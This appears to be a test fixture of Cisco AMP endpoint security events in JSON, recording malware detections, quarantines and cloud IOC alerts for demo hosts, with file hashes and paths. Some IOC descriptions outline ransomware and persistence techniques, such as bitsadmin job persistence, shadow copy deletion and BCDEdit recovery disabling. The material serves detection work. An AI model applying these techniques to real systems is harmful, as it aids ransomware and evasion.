Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} 